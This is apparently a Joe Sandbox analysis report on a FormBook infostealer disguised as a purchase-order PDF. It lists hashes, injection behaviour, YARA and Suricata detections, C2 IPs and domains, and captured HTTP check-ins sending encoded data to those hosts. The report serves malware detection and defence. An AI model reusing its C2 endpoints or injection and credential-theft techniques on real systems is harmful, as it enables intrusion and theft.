Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Purchase_Order_pdf.exe

Overview

General Information

Sample name:Purchase_Order_pdf.exe
Analysis ID:1545090
MD5:0e51b97a594aa2f1756261a47a695484
SHA1:0c2d719650e6a5bab5a3616c357eb20f6bb6cb6d
SHA256:03489fbf1f559b8f7e7c6a0dec74826233e3c79ca34bdf06f9617f269b68ff54
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious RASdial Activity
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Purchase_Order_pdf.exe (PID: 4148 cmdline: "C:\Users\user\Desktop\Purchase_Order_pdf.exe" MD5: 0E51B97A594AA2F1756261A47A695484)
    • svchost.exe (PID: 1288 cmdline: "C:\Users\user\Desktop\Purchase_Order_pdf.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • hEtOKWgxZfeL.exe (PID: 3160 cmdline: "C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • rasdial.exe (PID: 2924 cmdline: "C:\Windows\SysWOW64\rasdial.exe" MD5: A280B0F42A83064C41CFFDC1CD35136E)
          • hEtOKWgxZfeL.exe (PID: 1492 cmdline: "C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4676 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.2433455475.00000000087B0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.2433455475.00000000087B0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bc30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13dbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000005.00000002.4485573273.0000000000DD0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.4485573273.0000000000DD0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bc30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13dbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000005.00000002.4484572757.0000000000A10000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: Suspicious RASdial Activity
        Source: Process startedAuthor: juju4: Data: Command: "C:\Windows\SysWOW64\rasdial.exe", CommandLine: "C:\Windows\SysWOW64\rasdial.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rasdial.exe, NewProcessName: C:\Windows\SysWOW64\rasdial.exe, OriginalFileName: C:\Windows\SysWOW64\rasdial.exe, ParentCommandLine: "C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe" , ParentImage: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe, ParentProcessId: 3160, ParentProcessName: hEtOKWgxZfeL.exe, ProcessCommandLine: "C:\Windows\SysWOW64\rasdial.exe", ProcessId: 2924, ProcessName: rasdial.exe
        Sigma detected: Uncommon Svchost Parent Process
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Purchase_Order_pdf.exe", CommandLine: "C:\Users\user\Desktop\Purchase_Order_pdf.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Purchase_Order_pdf.exe", ParentImage: C:\Users\user\Desktop\Purchase_Order_pdf.exe, ParentProcessId: 4148, ParentProcessName: Purchase_Order_pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\Purchase_Order_pdf.exe", ProcessId: 1288, ProcessName: svchost.exe
        Sigma detected: Windows Processes Suspicious Parent Directory
        Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Purchase_Order_pdf.exe", CommandLine: "C:\Users\user\Desktop\Purchase_Order_pdf.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Purchase_Order_pdf.exe", ParentImage: C:\Users\user\Desktop\Purchase_Order_pdf.exe, ParentProcessId: 4148, ParentProcessName: Purchase_Order_pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\Purchase_Order_pdf.exe", ProcessId: 1288, ProcessName: svchost.exe

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-30T04:56:49.169655+010020181411A Network Trojan was detected18.141.10.10780192.168.2.549990TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-30T04:56:10.140779+010028554651A Network Trojan was detected192.168.2.54990054.67.87.11080TCP
        2024-10-30T04:56:33.945080+010028554651A Network Trojan was detected192.168.2.549984195.161.68.880TCP
        2024-10-30T04:56:48.804469+010028554651A Network Trojan was detected192.168.2.54999018.141.10.10780TCP
        2024-10-30T04:57:04.070060+010028554651A Network Trojan was detected192.168.2.549994197.189.237.18680TCP
        2024-10-30T04:57:38.392162+010028554651A Network Trojan was detected192.168.2.549998162.0.238.24680TCP
        2024-10-30T04:57:52.116985+010028554651A Network Trojan was detected192.168.2.55000231.31.196.1780TCP
        2024-10-30T04:58:13.602539+010028554651A Network Trojan was detected192.168.2.550006188.114.97.380TCP
        2024-10-30T04:58:34.799142+010028554651A Network Trojan was detected192.168.2.550010206.119.82.14780TCP
        2024-10-30T04:58:48.193549+010028554651A Network Trojan was detected192.168.2.550014162.0.209.21380TCP
        2024-10-30T04:59:01.765592+010028554651A Network Trojan was detected192.168.2.5500183.33.130.19080TCP
        2024-10-30T04:59:15.119690+010028554651A Network Trojan was detected192.168.2.550022144.34.186.8580TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-30T04:56:26.288725+010028554641A Network Trojan was detected192.168.2.549981195.161.68.880TCP
        2024-10-30T04:56:28.819959+010028554641A Network Trojan was detected192.168.2.549982195.161.68.880TCP
        2024-10-30T04:56:31.398107+010028554641A Network Trojan was detected192.168.2.549983195.161.68.880TCP
        2024-10-30T04:56:40.835616+010028554641A Network Trojan was detected192.168.2.54998718.141.10.10780TCP
        2024-10-30T04:56:43.523161+010028554641A Network Trojan was detected192.168.2.54998818.141.10.10780TCP
        2024-10-30T04:56:46.132508+010028554641A Network Trojan was detected192.168.2.54998918.141.10.10780TCP
        2024-10-30T04:56:56.070267+010028554641A Network Trojan was detected192.168.2.549991197.189.237.18680TCP
        2024-10-30T04:56:58.617053+010028554641A Network Trojan was detected192.168.2.549992197.189.237.18680TCP
        2024-10-30T04:57:01.163830+010028554641A Network Trojan was detected192.168.2.549993197.189.237.18680TCP
        2024-10-30T04:57:30.742881+010028554641A Network Trojan was detected192.168.2.549995162.0.238.24680TCP
        2024-10-30T04:57:33.302020+010028554641A Network Trojan was detected192.168.2.549996162.0.238.24680TCP
        2024-10-30T04:57:35.848987+010028554641A Network Trojan was detected192.168.2.549997162.0.238.24680TCP
        2024-10-30T04:57:44.553479+010028554641A Network Trojan was detected192.168.2.54999931.31.196.1780TCP
        2024-10-30T04:57:47.023221+010028554641A Network Trojan was detected192.168.2.55000031.31.196.1780TCP
        2024-10-30T04:57:49.538844+010028554641A Network Trojan was detected192.168.2.55000131.31.196.1780TCP
        2024-10-30T04:58:05.947427+010028554641A Network Trojan was detected192.168.2.550003188.114.97.380TCP
        2024-10-30T04:58:08.500508+010028554641A Network Trojan was detected192.168.2.550004188.114.97.380TCP
        2024-10-30T04:58:11.041197+010028554641A Network Trojan was detected192.168.2.550005188.114.97.380TCP
        2024-10-30T04:58:20.179645+010028554641A Network Trojan was detected192.168.2.550007206.119.82.14780TCP
        2024-10-30T04:58:22.726433+010028554641A Network Trojan was detected192.168.2.550008206.119.82.14780TCP
        2024-10-30T04:58:25.276554+010028554641A Network Trojan was detected192.168.2.550009206.119.82.14780TCP
        2024-10-30T04:58:40.554521+010028554641A Network Trojan was detected192.168.2.550011162.0.209.21380TCP
        2024-10-30T04:58:43.097311+010028554641A Network Trojan was detected192.168.2.550012162.0.209.21380TCP
        2024-10-30T04:58:45.631525+010028554641A Network Trojan was detected192.168.2.550013162.0.209.21380TCP
        2024-10-30T04:58:54.945252+010028554641A Network Trojan was detected192.168.2.5500153.33.130.19080TCP
        2024-10-30T04:58:56.637693+010028554641A Network Trojan was detected192.168.2.5500163.33.130.19080TCP
        2024-10-30T04:58:59.148940+010028554641A Network Trojan was detected192.168.2.5500173.33.130.19080TCP
        2024-10-30T04:59:07.485163+010028554641A Network Trojan was detected192.168.2.550019144.34.186.8580TCP
        2024-10-30T04:59:10.038967+010028554641A Network Trojan was detected192.168.2.550020144.34.186.8580TCP
        2024-10-30T04:59:12.589574+010028554641A Network Trojan was detected192.168.2.550021144.34.186.8580TCP
        2024-10-30T04:59:21.101320+010028554641A Network Trojan was detected192.168.2.550023136.143.186.1280TCP
        2024-10-30T04:59:23.999596+010028554641A Network Trojan was detected192.168.2.550024136.143.186.1280TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Multi AV Scanner detection for domain / URL
        Source: www.fieldelse.netVirustotal: Detection: 6%Perma Link
        Multi AV Scanner detection for submitted file
        Source: Purchase_Order_pdf.exeReversingLabs: Detection: 41%
        Yara detected FormBook
        Source: Yara matchFile source: 00000002.00000002.2433455475.00000000087B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.4485573273.0000000000DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.4484572757.0000000000A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.4487012045.0000000004EF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.2428914356.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.4485613681.0000000002F80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.4485647007.0000000000E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.2429698099.0000000003BE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Machine Learning detection for sample
        Source: Purchase_Order_pdf.exeJoe Sandbox ML: detected
        Source: Purchase_Order_pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: hEtOKWgxZfeL.exe, 00000004.00000002.4484569448.0000000000AEE000.00000002.00000001.01000000.00000005.sdmp, hEtOKWgxZfeL.exe, 00000007.00000002.4484878886.0000000000AEE000.00000002.00000001.01000000.00000005.sdmp
        Source: Binary string: wntdll.pdbUGP source: Purchase_Order_pdf.exe, 00000000.00000003.2047254065.0000000004760000.00000004.00001000.00020000.00000000.sdmp, Purchase_Order_pdf.exe, 00000000.00000003.2048049881.00000000045C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335290079.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2429250669.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2333557983.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2429250669.0000000003800000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4485958019.0000000004BBE000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000005.00000003.2431777913.000000000486C000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000003.2429249602.00000000046B2000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4485958019.0000000004A20000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: rasdial.pdb source: svchost.exe, 00000002.00000002.2429147053.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398042132.000000000321A000.00000004.00000020.00020000.00000000.sdmp, hEtOKWgxZfeL.exe, 00000004.00000002.4485192473.0000000001388000.00000004.00000020.00020000.00000000.sdmp, hEtOKWgxZfeL.exe, 00000004.00000003.2368169861.000000000139B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: Purchase_Order_pdf.exe, 00000000.00000003.2047254065.0000000004760000.00000004.00001000.00020000.00000000.sdmp, Purchase_Order_pdf.exe, 00000000.00000003.2048049881.00000000045C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335290079.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2429250669.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2333557983.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2429250669.0000000003800000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4485958019.0000000004BBE000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000005.00000003.2431777913.000000000486C000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000003.2429249602.00000000046B2000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4485958019.0000000004A20000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: rasdial.pdbGCTL source: svchost.exe, 00000002.00000002.2429147053.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398042132.000000000321A000.00000004.00000020.00020000.00000000.sdmp, hEtOKWgxZfeL.exe, 00000004.00000002.4485192473.0000000001388000.00000004.00000020.00020000.00000000.sdmp, hEtOKWgxZfeL.exe, 00000004.00000003.2368169861.000000000139B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: svchost.pdb source: rasdial.exe, 00000005.00000002.4484702585.0000000000AD9000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4486451389.000000000504C000.00000004.10000000.00040000.00000000.sdmp, hEtOKWgxZfeL.exe, 00000007.00000002.4485691853.0000000002ABC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2719786041.00000000121FC000.00000004.80000000.00040000.00000000.sdmp
        Source: Binary string: svchost.pdbUGP source: rasdial.exe, 00000005.00000002.4484702585.0000000000AD9000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4486451389.000000000504C000.00000004.10000000.00040000.00000000.sdmp, hEtOKWgxZfeL.exe, 00000007.00000002.4485691853.0000000002ABC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2719786041.00000000121FC000.00000004.80000000.00040000.00000000.sdmp

        Networking

        barindex
        Suricata IDS alerts for network traffic
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49992 -> 197.189.237.186:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49900 -> 54.67.87.110:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50001 -> 31.31.196.17:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50012 -> 162.0.209.213:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50013 -> 162.0.209.213:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50014 -> 162.0.209.213:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50003 -> 188.114.97.3:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49994 -> 197.189.237.186:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49991 -> 197.189.237.186:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49997 -> 162.0.238.246:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49983 -> 195.161.68.8:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49995 -> 162.0.238.246:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50016 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49987 -> 18.141.10.107:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49999 -> 31.31.196.17:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50002 -> 31.31.196.17:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50000 -> 31.31.196.17:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50010 -> 206.119.82.147:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50020 -> 144.34.186.85:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50021 -> 144.34.186.85:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49982 -> 195.161.68.8:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49990 -> 18.141.10.107:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50024 -> 136.143.186.12:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50018 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49996 -> 162.0.238.246:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50015 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50007 -> 206.119.82.147:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49984 -> 195.161.68.8:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49989 -> 18.141.10.107:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50009 -> 206.119.82.147:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50011 -> 162.0.209.213:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49981 -> 195.161.68.8:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50004 -> 188.114.97.3:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49988 -> 18.141.10.107:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50023 -> 136.143.186.12:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50006 -> 188.114.97.3:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49993 -> 197.189.237.186:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50008 -> 206.119.82.147:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50005 -> 188.114.97.3:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50019 -> 144.34.186.85:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50017 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49998 -> 162.0.238.246:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50022 -> 144.34.186.85:80
        Performs DNS queries to domains with low reputation
        Source: DNS query: www.ngmr.xyz
        Source: DNS query: www.animekuid.xyz
        Source: DNS query: www.animekuid.xyz
        Source: DNS query: www.animekuid.xyz
        Source: DNS query: www.animekuid.xyz
        Source: DNS query: www.animekuid.xyz
        Source: DNS query: www.animekuid.xyz
        Source: DNS query: www.animekuid.xyz
        Source: DNS query: www.animekuid.xyz
        Source: DNS query: www.animekuid.xyz
        Source: DNS query: www.animekuid.xyz
        Source: DNS query: www.huyven.xyz
        Source: Joe Sandbox ViewIP Address: 162.0.238.246 162.0.238.246
        Source: Joe Sandbox ViewIP Address: 136.143.186.12 136.143.186.12
        Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
        Source: Joe Sandbox ViewASN Name: ZOHO-ASUS ZOHO-ASUS
        Source: Joe Sandbox ViewASN Name: xneeloZA xneeloZA
        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
        Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.5:49990
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /fu87/?vxPD=qh6vHM1wnebxXDDw2+FKNmF+EgGb6h3lhyJTJqyJk9tXxJTOz685U0RnFTuJgXE78BkDdexAIHcYDkJjTquRDOTOtPaRUKFiNfEDt1vQqQEhgT+IhmyUGPK3HCAi1oMdiQ==&7JH=bvSPlHnHQ4A HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.ngmr.xyzUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
        Source: global trafficHTTP traffic detected: GET /czka/?vxPD=ec+/5ooiqEi687og6mxZgK97hGtyT8hL+UNAVpoR3RpVRqn8W9A98dmq3fmGshL635UHDIR5u/r4iIgXkla3rsnbIqFgNahEcjh4DtJ4lSLz0jzSBM29wabUMiG34aKFBg==&7JH=bvSPlHnHQ4A HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.drivedoge.websiteUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
        Source: global trafficHTTP traffic detected: GET /exug/?7JH=bvSPlHnHQ4A&vxPD=TUpMmFq2kwIXLFstS9tSAK6sg3+MTXwTelyO0iz++Kl2PamQN8cgWwJpHGB2BYM6TBg0ujJhQFrOEWIIA95gJhU2w3nrLf6Fr1xVloq0NNPRZ4qmm6KGpgvxijzqAjWBDA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.fieldelse.netUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
